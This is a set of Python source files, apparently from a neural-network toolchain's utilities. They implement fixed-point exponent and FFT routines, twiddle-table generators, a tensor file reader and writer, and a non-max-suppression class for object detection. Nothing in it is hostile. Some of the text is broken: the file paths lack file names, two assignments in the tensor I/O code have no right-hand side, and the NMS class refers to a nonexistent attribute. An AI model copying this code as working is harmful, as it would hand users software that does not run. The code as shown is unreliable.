np.array([1], dtype=np.int32) << (n - 1) return (np.multiply(x.astype(np.int16), y.astype(np.int16), dtype=np.int32) + rounding) >> n def gap_mulRN(x, y, n): rounding = np.array([1], dtype=np.int32) << (n - 1) return (np.multiply(x.astype(np.uint16), y.astype(np.uint16), dtype=np.int32) + rounding) >> n def gap_roundnorm(x, scale): rounding = np.array([1], dtype=np.int32) << (scale - 1) return (x.astype(np.int32) + rounding) >> scale def gap_roundnorm_reg(x, scale): rounding = np.where(x != 0, np.array([1], dtype=np.int32) << (scale - 1), 0) return (x.astype(np.int32) + rounding) >> scale def exp_fp_17_15(X): X = X.astype(np.uint32) result = np.zeros(X.shape, dtype=np.int32) zero_mask = X == 0 result[zero_mask] = 0x8000 non_zero_mask = np.logical_not(zero_mask) Y = np.ndarray(X.shape, dtype=np.int32) Y[non_zero_mask] = np.abs(X[non_zero_mask].astype(np.int32)) int_x = np.ndarray(X.shape, dtype=np.int32) int_x[non_zero_mask] = Y[non_zero_mask] >> 15 overflow_mask = np.logical_and(int_x >= (len(INTEGER_EXP_LUT) - 1), non_zero_mask) result[np.logical_and(X == Y, overflow_mask)] = 0x7FFFFFF result[np.logical_and(X != Y, overflow_mask)] = 0 non_zero_mask[overflow_mask] = False fract_x = np.ndarray(X.shape, dtype=np.int32) fract_x[non_zero_mask] = Y[non_zero_mask] & 0x7FFF bit_extract_mask = np.logical_and(non_zero_mask, gap_bitextractu(fract_x, 1, 14)) fract_x[bit_extract_mask] -= 0x8000 int_x[bit_extract_mask] += 1 scaled_int = np.ndarray(X.shape, dtype=np.int32) scaled_int[non_zero_mask] = INTEGER_EXP_LUT[int_x[non_zero_mask]] scaled_fract = np.ndarray(X.shape, dtype=np.uint16) scaled_fract[non_zero_mask] = FRACTION_EXP_LUT[int_x[non_zero_mask]] fract_x_s = fract_x.astype(np.int16) z_s = fract_x.astype(np.int16) for i in range(1, len(EXP_COEFF_LUT)): result[non_zero_mask] += z_s[non_zero_mask].astype(np.int32) * EXP_COEFF_LUT[i] z_s[non_zero_mask] = gap_mulsRN(z_s[non_zero_mask], fract_x_s[non_zero_mask], 15) result[non_zero_mask] = gap_roundnorm(result[non_zero_mask], 15) + EXP_COEFF_LUT[0] unsigned_res = result.astype(np.uint16) result[non_zero_mask] = (gap_mulRN(unsigned_res[non_zero_mask], scaled_fract[non_zero_mask], 15)\ + unsigned_res[non_zero_mask] * scaled_int[non_zero_mask]) neg_mask = np.logical_and(np.logical_and(non_zero_mask, result != 0), X > 0x7FFFFFFF) result[neg_mask] = ((0x7FFFFFFF)//result[neg_mask]) >> 1 return result.astype(np.uint32) ``` #### File: nntool/utils/ ```python import numpy as np from copy import deepcopy def Rad2_FFT_DIF_Fix16(In_Data, Twiddles, N_fft): Data = deepcopy(In_Data) iLog2N = int(np.log2(N_fft)) iL = 1 iM = N_fft // 2 for iCnt1 in range(iLog2N-3): iQ = 0 for iCnt2 in range(0, iM): Wr = np.int64(Twiddles[0, iQ]) Wi = np.int64(Twiddles[1, iQ]) iA = iCnt2 for iCnt3 in range(iL): iB = iA + iM Tmpr = np.int64(Data[0, iA]) - Data[0, iB] Tmpi = np.int64(Data[1, iA]) - Data[1, iB] Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]) >> 1) Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]) >> 1) Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15) >> 1) Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15) >> 1) iA = iA + 2 * iM iQ = iQ + iL iL *= 2 iM //= 2 iQ = 0 iM = 4 iL = int(N_fft) >> 3 for iCnt2 in range(0, iM): Wr = Twiddles[0, iQ] Wi = Twiddles[1, iQ] iA = iCnt2 for iCnt3 in range(iL): iB = iA + iM Tmpr = np.int64(Data[0, iA]) - Data[0, iB] Tmpi = np.int64(Data[1, iA]) - Data[1, iB] Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB])) Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB])) Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15)) Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15)) iA = iA + 2 * iM iQ += iL iQ = 0 iM = 2 iL = int(N_fft) >> 2 for iCnt2 in range(0, iM): Wr = Twiddles[0, iQ] Wi = Twiddles[1, iQ] iA = iCnt2 for iCnt3 in range(iL): iB = iA + iM Tmpr = np.int64(Data[0, iA]) - Data[0, iB] Tmpi = np.int64(Data[1, iA]) - Data[1, iB] Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB])) Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB])) Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15)) Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15)) iA = iA + 2 * iM iQ += iL iM = 1 iL = N_fft // 2 iA = 0 for iCnt3 in range(iL): iB = iA + iM Tmpr = np.int32(Data[0, iA]) - Data[0, iB] Tmpi = np.int32(Data[1, iA]) - Data[1, iB] Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB])) Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB])) Data[0, iB] = np.int16(Tmpr) Data[1, iB] = np.int16(Tmpi) iA = iA + 2 * iM return Data def Rad4_FFT_DIF_Fix16(In_Data, Twiddles, N_fft): Data = deepcopy(In_Data) iLog4N = int(np.log2(N_fft)) >> 1 iL = 1 iM = N_fft // 4 for iCnt1 in range(iLog4N-2): iQ = 0 for iCnt2 in range(0, iM): W1r = Twiddles[0, iQ] W1i = Twiddles[1, iQ] W2r = Twiddles[0, iQ*2] W2i = Twiddles[1, iQ*2] W3r = Twiddles[0, iQ*3] W3i = Twiddles[1, iQ*3] iA = iCnt2 for iCnt3 in range(iL): A1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) + (Data[0, iA+iM] + Data[0, iA+3*iM])) A1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) + (Data[1, iA+iM] + Data[1, iA+3*iM])) B1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) + (Data[1, iA+iM] - Data[1, iA+3*iM])) B1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) - (Data[0, iA+iM] - Data[0, iA+3*iM])) C1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) - (Data[0, iA+iM] + Data[0, iA+3*iM])) C1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) - (Data[1, iA+iM] + Data[1, iA+3*iM])) D1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) - (Data[1, iA+iM] - Data[1, iA+3*iM])) D1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) + (Data[0, iA+iM] - Data[0, iA+3*iM])) Tmp = B1r B1r = np.int64(B1r*W1r - B1i*W1i) >> 15 B1i = np.int64(Tmp*W1i + B1i*W1r) >> 15 Tmp = C1r C1r = np.int64(C1r*W2r - C1i*W2i) >> 15 C1i = np.int64(Tmp*W2i + C1i*W2r) >> 15 Tmp = D1r D1r = np.int64(D1r*W3r - D1i*W3i) >> 15 D1i = np.int64(Tmp*W3i + D1i*W3r) >> 15 Data[0, iA ] = np.int16(A1r >> 2) Data[1, iA ] = np.int16(A1i >> 2) Data[0, iA+ iM] = np.int16(B1r >> 2) Data[1, iA+ iM] = np.int16(B1i >> 2) Data[0, iA+2*iM] = np.int16(C1r >> 2) Data[1, iA+2*iM] = np.int16(C1i >> 2) Data[0, iA+3*iM] = np.int16(D1r >> 2) Data[1, iA+3*iM] = np.int16(D1i >> 2) iA = iA + 4 * iM iQ += iL iL = iL * 4 iM = iM // 4 iQ = 0 iM = 4 iL = N_fft // 16 for iCnt2 in range(0, iM): W1r = Twiddles[0, iQ] W1i = Twiddles[1, iQ] W2r = Twiddles[0, iQ*2] W2i = Twiddles[1, iQ*2] W3r = Twiddles[0, iQ*3] W3i = Twiddles[1, iQ*3] iA = iCnt2 for iCnt3 in range(iL): A1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) + (Data[0, iA+iM] + Data[0, iA+3*iM])) A1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) + (Data[1, iA+iM] + Data[1, iA+3*iM])) B1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) + (Data[1, iA+iM] - Data[1, iA+3*iM])) B1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) - (Data[0, iA+iM] - Data[0, iA+3*iM])) C1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) - (Data[0, iA+iM] + Data[0, iA+3*iM])) C1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) - (Data[1, iA+iM] + Data[1, iA+3*iM])) D1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) - (Data[1, iA+iM] - Data[1, iA+3*iM])) D1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) + (Data[0, iA+iM] - Data[0, iA+3*iM])) Tmp = B1r B1r = np.int64(B1r*W1r - B1i*W1i) >> 15 B1i = np.int64(Tmp*W1i + B1i*W1r) >> 15 Tmp = C1r C1r = np.int64(C1r*W2r - C1i*W2i) >> 15 C1i = np.int64(Tmp*W2i + C1i*W2r) >> 15 Tmp = D1r D1r = np.int64(D1r*W3r - D1i*W3i) >> 15 D1i = np.int64(Tmp*W3i + D1i*W3r) >> 15 Data[0, iA ] = np.int16(A1r) Data[1, iA ] = np.int16(A1i) Data[0, iA+ iM] = np.int16(B1r) Data[1, iA+ iM] = np.int16(B1i) Data[0, iA+2*iM] = np.int16(C1r) Data[1, iA+2*iM] = np.int16(C1i) Data[0, iA+3*iM] = np.int16(D1r) Data[1, iA+3*iM] = np.int16(D1i) iA = iA + 4 * iM iQ += iL iM = 1 iL = N_fft // 4 iA = 0 for iCnt3 in range(iL): Ar = np.int32(Data[0, iA]) Ai = np.int32(Data[1, iA]) Br = np.int32(Data[0, iA+iM]) Bi = np.int32(Data[1, iA+iM]) Cr = np.int32(Data[0, iA+2*iM]) Ci = np.int32(Data[1, iA+2*iM]) Dr = np.int32(Data[0, iA+3*iM]) Di = np.int32(Data[1, iA+3*iM]) Data[0, iA ] = np.int16(Ar + Cr + Br + Dr) Data[1, iA ] = np.int16(Ai + Ci + Bi + Di) Data[0, iA+ iM] = np.int16(Ar - Cr + Bi - Di) Data[1, iA+ iM] = np.int16(Ai - Ci - Br + Dr) Data[0, iA+2*iM] = np.int16(Ar + Cr - Br - Dr) Data[1, iA+2*iM] = np.int16(Ai + Ci - Bi - Di) Data[0, iA+3*iM] = np.int16(Ar - Cr - Bi + Di) Data[1, iA+3*iM] = np.int16(Ai - Ci + Br - Dr) iA = iA + 4 * iM return Data def SwapSamples(In_Data, SwapTable): Data = deepcopy(In_Data) for i, swap_idx in enumerate(SwapTable): if i < swap_idx: Sr = Data[0, i] Si = Data[1, i] Data[0, i] = Data[0, swap_idx] Data[1, i] = Data[1, swap_idx] Data[0, swap_idx] = Sr Data[1, swap_idx] = Si return Data def RFFT_Step_Fix16(In_Data, RTwiddles, N_fft): RFFT_Out = np.zeros((2, N_fft//2+1)) xBR = np.int32(In_Data[0, 0]) >> 2 xBI = np.int32(In_Data[1, 0]) >> 2 xAR = np.int32(In_Data[0, 0]) >> 2 xAI = np.int32(In_Data[1, 0]) >> 2 RFFT_Out[0, 0] = (xBR + xAR + xBI + xAI) RFFT_Out[1, 0] = (xAI - xBI + xBR - xAR) k = N_fft // 2 - 1 for i in range(k): twr, twi = np.int64(RTwiddles[0, 1+i]), np.int64(RTwiddles[1, 1+i]) xar, xai = np.int32(In_Data [0, 1+i]), np.int32(In_Data [1, 1+i]) xbr, xbi = np.int32(In_Data [0, k-i]), np.int32(In_Data [1, k-i]) t1r = np.int32((-xar + xbr) >> 2) t1i = np.int32((-xai - xbi) >> 2) t2r = np.int32(( xar + xbr) >> 2) t2i = np.int32(( xai - xbi) >> 2) RFFT_Out[0, i+1] = np.int16(((twr*t1r - twi*t1i) >> 15) + t2r) RFFT_Out[1, i+1] = np.int16(((twr*t1i + twi*t1r) >> 15) + t2i) xBR = np.int32(In_Data[0, k-(k-1)]) >> 2 xBI = np.int32(In_Data[1, k-(k-1)]) >> 2 xAR = np.int32(In_Data[0, 1+(k-1)]) >> 2 xAI = np.int32(In_Data[1, 1+(k-1)]) >> 2 RFFT_Out[0, k+1] = np.int16( xBR + xAR - xBI - xAI ) RFFT_Out[1, k+1] = np.int16(0) #( xAI - xBI - xBR + xAR ) return RFFT_Out ``` #### File: nntool/utils/ ```python import logging import os import struct from io import BufferedWriter, BufferedReader import numpy as np LOG = logging.getLogger("nntool." + __name__) TYPES = { 8: np.int8, 16: np.int16, 32: np.int32 } CTYPES = { np.int8: "signed char", np.int16: "short int", np.int32: "int" } class Header(): __FMT = '5i4i' def __init__(self, step, tensor_type, size, elem_size, num_dims, *dims): self.step = step self.tensor_type = tensor_type self.size = size self.elem_size = elem_size self.dims = [dims[i] for i in range(num_dims)] @classmethod def read(cls, fp: BufferedReader): buf = if buf: return cls(*struct.unpack(cls.__FMT, buf)) return None def write(self, fp: BufferedWriter): assert len(self.dims) <= 4, "up to 4 dimensions are supported" dims = self.dims.copy() + [0] * (4 - len(self.dims)) buf = struct.pack(self.__FMT, self.step, self.tensor_type, self.size, self.elem_size, len(self.dims), *dims) fp.write(buf) def write_dims(prefix, fp, dims, elem_size): assert len(dims) == 3 dim_names = ["CHANNELS", "HEIGHT", "WIDTH"] for i, v in enumerate(dims): fp.write('{}_{}?={}\n'.format(prefix, dim_names[i], v)) fp.write('{}_BITS?={}\n'.format(prefix, elem_size)) fp.write('{}_TYPE?={}\n'.format(prefix, CTYPES[TYPES[elem_size]])) def write_make_include_file(filename, header, output_shape, output_elem_size): with open(filename, 'w') as fp: write_dims("INPUT", fp, header.dims, header.elem_size) write_dims("OUTPUT", fp, output_shape, output_elem_size) def get_bits(tensor): bit_size = -1 for k, v in TYPES.items(): if tensor.dtype == v: bit_size = k break if bit_size < 0: raise ValueError("only int8, int16 and int32 are supported") return bit_size def write_gap_tensor(filename, tensor, step=0, output_tensor=None, make_file=None): bit_size = get_bits(tensor) with open(filename, 'wb') as fp: header = Header(step, 0, tensor.size * bit_size // 8, bit_size, len(tensor.shape), *tensor.shape) header.write(fp) tensor.tofile(fp) if output_tensor is not None and make_file is not None: output_bit_size = get_bits(output_tensor) write_make_include_file(make_file, header, output_tensor.shape, output_bit_size) def read_gap_tensors(filename): tensors = {} size = os.path.getsize(filename) max_step = -1 with open(filename, 'rb') as fp: while fp.tell() < size: header = if not header: break if header.elem_size not in TYPES: LOG.error("Bit width %s not found in types list. File may be corrupted.", header.elem_size) raise ValueError() tensor = np.fromfile(fp, dtype=TYPES[header.elem_size], count=header.size) step_rec = tensors.get(header.step) if not step_rec: step_rec = [None]*3 tensors[header.step] = step_rec elem = 0 if header.tensor_type < 2 else header.tensor_type - 1 step_rec[elem] = tensor.reshape(header.dims) if header.step > max_step: max_step = header.step return [tensors.get(i) for i in range(max_step + 1)] ``` #### File: nntool/utils/ ```python import numpy as np def gen_fft_twiddles_lut(Nfft, Inverse=False, rad4=False): Phi = (np.pi * 2 / Nfft) * np.arange(0, Nfft) if Inverse: Twiddles_real = np.cos(Phi) Twiddles_imag = np.sin(Phi) else: Twiddles_real = np.cos(-Phi) Twiddles_imag = np.sin(-Phi) if rad4: twid = np.empty((2 * int(3*Nfft/4), ), dtype=Twiddles_real.dtype) twid[0::2] = Twiddles_real[:int(3*Nfft/4)] twid[1::2] = Twiddles_imag[:int(3*Nfft/4)] return twid twid = np.empty((2 * int(Nfft//2), ), dtype=Twiddles_real.dtype) twid[0::2] = Twiddles_real[:int(Nfft//2)] twid[1::2] = Twiddles_imag[:int(Nfft//2)] return twid def gen_rfft_twiddles_lut(Nfft): Phi = (np.pi * 2 / Nfft) * np.arange(0, Nfft//2) Twiddles_real = np.sin(Phi) Twiddles_imag = np.cos(Phi) twid = np.empty((Twiddles_real.size + Twiddles_imag.size, ), dtype=Twiddles_real.dtype) twid[0::2] = Twiddles_real twid[1::2] = Twiddles_imag return twid def gen_fft_swaptable_lut(Ni, rad4=False): if rad4: log4 = int(np.log2(Ni) / 2) iL = Ni / 4 iM = 1 SwapTable = np.zeros(Ni) for i in range(log4): for j in range(iM): SwapTable[j + iM] = SwapTable[j] + iL SwapTable[j + 2*iM] = SwapTable[j] + 2*iL SwapTable[j + 3*iM] = SwapTable[j] + 3*iL iL /= 4 iM *= 4 else: log2 = int(np.log2(Ni)) iL = Ni / 2 iM = 1 SwapTable = np.zeros(Ni) for i in range(log2): for j in range(iM): SwapTable[j + iM] = SwapTable[j] + iL iL /= 2 iM *= 2 return SwapTable def gen_dct_twiddles_lut(Ndct, dct_type=2, norm=None): norm_factor = np.ones((Ndct, Ndct)) if norm == "ortho" and dct_type == 2: norm_factor *= np.sqrt(1/(2*Ndct)) norm_factor[0] = np.sqrt(1/(4*Ndct)) if norm == "ortho" and dct_type == 3: norm_factor *= np.sqrt(1/(2*Ndct)) norm_factor[0] = np.sqrt(1/(Ndct)) DCT_Coeff = np.zeros((Ndct, Ndct)) for k in range(Ndct): for i in range(Ndct): if dct_type == 2: coeff = 2*np.cos(np.pi / (2*Ndct) * k * (2*i + 1)) elif dct_type == 3: coeff = 1 if i == 0 else 2*np.cos(np.pi / (2*Ndct) * i * (2*k + 1)) else: raise NotImplementedError("DCT type 2 and 3 only supported") DCT_Coeff[k, i] = coeff return (DCT_Coeff * norm_factor) ``` #### File: nntool/utils/ ```python import copy import json import os from typing import NamedTuple import numpy as np class ValException(Exception): pass class Detection(NamedTuple): bboxes: np.array scores: np.array classes: np.array class NonMaxSuppression(object): ''' Parameters that should be initialized: - max_detections_per_class - max_classes_per_detection - max_total_detections - iou_threshold - score_threshold - regular_nms ''' def __init__(self, nms_configuration, use_regular_nms=True): # pylint: disable=no-member,bare-except ''' # default values of parameters required for nms: max_classes_per_detection: Maximum number of classes to output per detection box. detections_per_class: Number of anchors used per class in Regular Non-Max-Suppression. use_regular_nms: 'Flag to set postprocessing op to use Regular NMS instead of Fast NMS.' ''' self._max_detections_per_class = 10 self._max_classes_per_detection = 1 self._max_total_detections = 100 self._iou_threshold = 0.3 self._score_threshold = 0.5 self._num_classes = None self.nms_configuration = nms_configuration # selection nms method: fast or regular? if use_regular_nms: self.nms_core = self._regular_nms else: self.nms_core = self._fast_nms # all allowed keys will be initialized as class attributes allowed_keys = set( ['using_json_config', 'using_pipeline_config', 'using_params']) # initialize all allowed keys to false self.__dict__.update((key, None) for key in allowed_keys) # and update the given keys by their given values self.__dict__.update( (key, value) for key, value in nms_configuration.items() if key in allowed_keys) 'loading params values' if self.using_json_config['INCLUDE']: json_config_path = self.using_json_config['json_config_path'] if not os.path.isfile(json_config_path): raise ValException( '\n\n the path to the json file is not valid.') with open(json_config_path) as json_file: json_data = json.load(json_file) try: self.max_detections_per_class = json_data['detections_per_class'] except: self.max_detections_per_class = self._max_detections_per_class print('Warning: deafutl assignement for max_detections_per_class: {value} .' .format(value=self._max_detections_per_class)) try: self.max_classes_per_detection = json_data['max_classes_per_detection'] except: self.max_classes_per_detection = self._max_classes_per_detection print('Warning: deafutl assignement for max_classes_per_detection: {value} .' .format(value=self._max_classes_per_detection)) try: self.max_total_detections = json_data['max_detections'] except: self.max_total_detections = self._max_total_detections print('Warning: deafutl assignement for max_total_detections: {value} .' .format(value=self._max_total_detections)) try: self.iou_threshold = json_data['nms_iou_threshold'] except: self.iou_threshold = self._iou_threshold print('Warning: deafutl assignement for iou_threshold: {value} .' .format(value=self._iou_threshold)) try: self.score_threshold = json_data['nms_score_threshold'] except: self.score_threshold = self._score_threshold print('Warning: deafutl assignement for score_threshold: {value} .' .format(value=self._score_threshold)) try: self.num_classes = json_data['num_classes'] except: self.num_classes = self._self.num_classes print('Warning: deafutl assignement for num_classes: {value} .' .format(value=self._self.num_classes)) self._output_quantized = json_data['_output_quantized'] self._support_output_type_float_in_quantized_op = json_data[ '_support_output_type_float_in_quantized_op'] elif self.using_pipeline_config['INCLUDE']: raise ValException('Need to import object_detection from tf') elif self.using_params['INCLUDE']: params = self.using_params['params'] # max_detection_per_class is left default self.max_detections_per_class = self._max_detections_per_class if isinstance(params['max_classes_per_detection'], int) and params['max_classes_per_detection'] > 0: self.max_classes_per_detection = params['max_classes_per_detection'] else: raise ValException('\n\n no valid max_classes_per_detection is assigned, shoulde be postive integer ...') if isinstance(params['max_detections'], int) and params['max_detections'] > 0: self.max_total_detections = params['max_detections'] else: raise ValException('\n\n no valid max_total_detections is assigned, shoulde be postive float/integer ...') if isinstance(params['nms_iou_threshold'], float) and params['nms_iou_threshold'] > 0 and \ params['nms_iou_threshold'] < 1.: self.iou_threshold = params['nms_iou_threshold'] else: raise ValException('\n\n no valid iou_threshold is assigned, shoulde be float in range of (0.,1.).') if isinstance(params['nms_score_threshold'], float) and params['nms_score_threshold'] > 0 and \ params['nms_score_threshold'] < 1.: self.score_threshold = params['nms_score_threshold'] else: raise ValException('\n\n no valid score_threshold is assigned, shoulde be float in range of (0.,1.).') if isinstance(params['num_classes'], int) and params['num_classes'] > 0: self.num_classes = params['num_classes'] else: raise ValException('\n\n no valid num_classes is assigned, shoulde be postive integer ...') else: raise ValException( '\n\n no method is chosen to assigne non-max-suppression ...') def calculate_iou(self, base_bbox, rest_bboxes): 'calculate iou between a base bounding box and an array of bboxes' ymin, xmin, ymax, xmax = 0, 1, 2, 3 # base anchor base_bbox_cor = copy.deepcopy(base_bbox) base_bbox_area = (base_bbox_cor[ymax] - base_bbox_cor[ymin]).astype(np.int32) *\ (base_bbox_cor[xmax] - base_bbox_cor[xmin]).astype(np.int32) # an array of anchors rest_bboxes_cor = copy.deepcopy(rest_bboxes) # rest anchors area rest_bboxes_area = (rest_bboxes_cor[:, ymax] - rest_bboxes_cor[:, ymin]) *\ (rest_bboxes_cor[:, xmax] - rest_bboxes_cor[:, xmin]) # inter section coordinates inter_ymin = np.maximum(rest_bboxes_cor[:, ymin], base_bbox_cor[ymin]) inter_xmin = np.maximum(rest_bboxes_cor[:, xmin], base_bbox_cor[xmin]) inter_ymax = np.minimum(rest_bboxes_cor[:, ymax], base_bbox_cor[ymax]) inter_xmax = np.minimum(rest_bboxes_cor[:, xmax], base_bbox_cor[xmax]) # TODO: do we need to keep pixel border horizons??? # inter section width and height inter_w = np.maximum(inter_xmax - inter_xmin, 0) inter_h = np.maximum(inter_ymax - inter_ymin, 0) inter_area = inter_w * inter_h iou = inter_area / (rest_bboxes_area + base_bbox_area - inter_area) return iou def greedy_non_maximum_suppression(self, bboxes, confidences): ''' This function performs greedy non maximum suppression algorithm on a dataframe of anchors. step 1) keep anchors with a confidence more than the assigned confidence threshold. step 2) sort derived anchors from step 1 according to their confidences. step 3) apply greedy nms over the sorted anchors by evaluation of ious. step 4) return a dataframe including the anchors, their confidences and class_id ''' # default anchors indices before appplying any sort bboxes_indices = np.arange(bboxes.shape[0]) # apply confidence threshold valid_confs_indices = bboxes_indices[confidences >= self.score_threshold] valid_confs = confidences[valid_confs_indices] # sort the confidences freater than the confidence threshold args = np.argsort(valid_confs)[::-1] # sort the confidences and inds = valid_confs_indices[args] # back to the original indices # greedy search kept_indices = [] while inds.size: base_ind = inds[0] # print('base_ind_confidence: ', confidences[base_ind]) rest_inds = inds[1:] # lets store the base anchor in the bank kept_indices.append(base_ind) base_bbox = copy.deepcopy(bboxes[base_ind, :]) rest_bboxes = copy.deepcopy(bboxes[rest_inds, :]) iou = self.calculate_iou(base_bbox, rest_bboxes) # print('before: rest_inds', rest_inds.shape) # lets keep bboxes having iou less than iou_threshold for the next itteration evaluation inds = rest_inds[iou < self.iou_threshold] # print('after: rest_inds', rest_inds.shape) # return the valid anchors valid_bboxes = bboxes[kept_indices, :] valid_bboxes_confidence = confidences[kept_indices] # to know how many classes are predicted for within each anchor: max_classes_per_detection valid_anchors_inds = kept_indices return valid_bboxes, valid_bboxes_confidence, np.array(valid_anchors_inds) def _regular_nms(self, bboxes, confidences): # num classes num_classes = confidences.shape[1] # predictions predicted_bboxes = [] # bboxes coordinates predicted_confidences = [] # bboxes confidences predicted_class_ids = [] # to which class the bbox belongs to? predicted_anchors_indides = [] # the bbox indices in the reference anchor array # loop over classes apart from the background for class_id in range(1, num_classes): # a one-dimentionsal array, including confidences for the class_id class_confidences = confidences[:, class_id] # a copy of transformed anchor boxes class_bboxes = copy.deepcopy(bboxes) # greedy nsm over the anchors, the output df has two new columns: confidence and class_id valid_class_bboxes, valid_class_confidences, valid_anchors_indices = self.greedy_non_maximum_suppression( class_bboxes, class_confidences) # if there are detections if len(valid_class_bboxes) > 0: num_detections = valid_class_bboxes.shape[0] 'apply <max_detections_per_class>' to_keep = min(num_detections, self.max_detections_per_class) # add decoded anchors to the bank predicted_bboxes.append(valid_class_bboxes[:to_keep, :]) predicted_confidences.append(valid_class_confidences[:to_keep]) valid_class_ids = np.zeros_like( valid_class_confidences[:to_keep])+class_id predicted_class_ids.append(valid_class_ids) predicted_anchors_indides.append( valid_anchors_indices[:to_keep]) 'now concatenate predictions for all classes.' predicted_bboxes = np.concatenate(predicted_bboxes) predicted_confidences = np.concatenate(predicted_confidences) predicted_class_ids = np.concatenate(predicted_class_ids) predicted_anchors_indides = np.concatenate(predicted_anchors_indides) 'apply <max_classes_per_detection>' # sort: descending order sorted_confidences_args = np.argsort(-predicted_confidences, axis=0) sorted_detections_bboxes = predicted_bboxes[sorted_confidences_args, :] sorted_detections_confidences = predicted_confidences[sorted_confidences_args] sorted_detections_class_ids = predicted_class_ids[sorted_confidences_args] sorted_detections_anchors_indides = predicted_anchors_indides[sorted_confidences_args] 're-write detections accordingly' predicted_bboxes = [] predicted_confidences = [] predicted_class_ids = [] predicted_anchors_indides = [] anchorS_indices = np.unique(sorted_detections_anchors_indides) # loop over anchors for i, ind in enumerate(anchorS_indices): anchor_indices = sorted_detections_anchors_indides == ind temp_detected_bboxes = sorted_detections_bboxes[anchor_indices, :] temp_detected_confidences = sorted_detections_confidences[anchor_indices] temp_detected_class_ids = sorted_detections_class_ids[anchor_indices] # all values must be equal to the <ind> temp_detected_anchors_indides = sorted_detections_anchors_indides[anchor_indices] # apply max_classes_per_detection: limited_number = min( len(temp_detected_anchors_indides), self.max_classes_per_detection) predicted_bboxes.append(temp_detected_bboxes[:limited_number, :]) predicted_confidences.append( temp_detected_confidences[:limited_number]) predicted_class_ids.append( temp_detected_class_ids[:limited_number]) predicted_anchors_indides.append( temp_detected_anchors_indides[:limited_number]) 'now concatenate predictions for all anchors.' predicted_bboxes = np.concatenate(predicted_bboxes) predicted_confidences = np.concatenate(predicted_confidences) predicted_class_ids = np.concatenate(predicted_class_ids) predicted_anchors_indides = np.concatenate(predicted_anchors_indides) 'apply <max_total_detections>' max_confidences_args = np.argsort(predicted_confidences, axis=0) total_detections_confidences = predicted_confidences[ max_confidences_args[-self.max_total_detections:]] total_detections_bboxes = predicted_bboxes[max_confidences_args[-self.max_total_detections:], :] total_detections_class_ids = predicted_class_ids[ max_confidences_args[-self.max_total_detections:]] #total_detections_anchors_indides = predicted_anchors_indides[max_confidences_args[-self.max_total_detections:]] # return total_detections_bboxes, total_detections_confidences, total_detections_class_ids, total_detections_anchors_indides return total_detections_bboxes, total_detections_confidences, total_detections_class_ids def fast_greedy_non_maximum_suppression(self, bboxes, confidences, labels_score, labels, anchors_indices): ''' applying greedy_non_maximum_suppression in a fast way!!! ''' # default anchors indices before appplying any sort bboxes_indices = np.arange(bboxes.shape[0]) # sort the confidences freater than the confidence threshold args = np.argsort(labels_score)[::-1] # sort the confidences and inds = bboxes_indices[args] # back to the original indices # greedy search kept_indices = [] while inds.size: base_ind = inds[0] rest_inds = inds[1:] # lets store the base anchor in the bank kept_indices.append(base_ind) base_bbox = copy.deepcopy(bboxes[base_ind, :]) rest_bboxes = copy.deepcopy(bboxes[rest_inds, :]) iou = self.calculate_iou(base_bbox, rest_bboxes) # lets keep bboxes having iou less than iou_threshold for the next itteration evaluation inds = rest_inds[iou < self.iou_threshold] # return the valid anchors valid_bboxes = bboxes[kept_indices, :] valid_confidences = confidences[kept_indices, :] valid_labels_score = labels_score[kept_indices] valid_labels_labels = labels[kept_indices] valid_anchors_indices = anchors_indices[kept_indices] return valid_bboxes, valid_confidences, valid_labels_score, valid_labels_labels, valid_anchors_indices def _fast_nms(self, bboxes, confidences): # num classes num_classes = confidences.shape[1] anchors_indices = np.arange(bboxes.shape[0]) # predictions predicted_bboxes = [] # bboxes coordinates predicted_labels = [] # bboxes confidences predicted_labels_score = [] # to which class the bbox belongs to? predicted_anchor_indices = [] # anchor indices, for debugging # convert one-hot labels into ordinal labels with their confidences labels = np.argmax(confidences, axis=1) # the ordinal labels labels_score = np.amax(confidences, axis=1) # the scores of labels # non-background labels non_background_indices = labels != 0 # non-background (nb) bboxes nb_bboxes = bboxes[non_background_indices, :] # bboxes nb_confidences = confidences[non_background_indices] # one-hot scores # labels with highest confidences nb_labels = labels[non_background_indices] # the highest confidences nb_labels_score = labels_score[non_background_indices] # anchors indices nb_anchors_indices = anchors_indices[non_background_indices] # non-background (nb) bboxes that have scores/confidences higher than score_threshold valid_nb_bboxes_inidces = nb_labels_score >= self.score_threshold # bboxes valid_nb_bboxes = nb_bboxes[valid_nb_bboxes_inidces, :] # one-hot scores valid_nb_confidences = nb_confidences[valid_nb_bboxes_inidces] # labels with highest confidences valid_nb_labels = nb_labels[valid_nb_bboxes_inidces] # the highest confidences 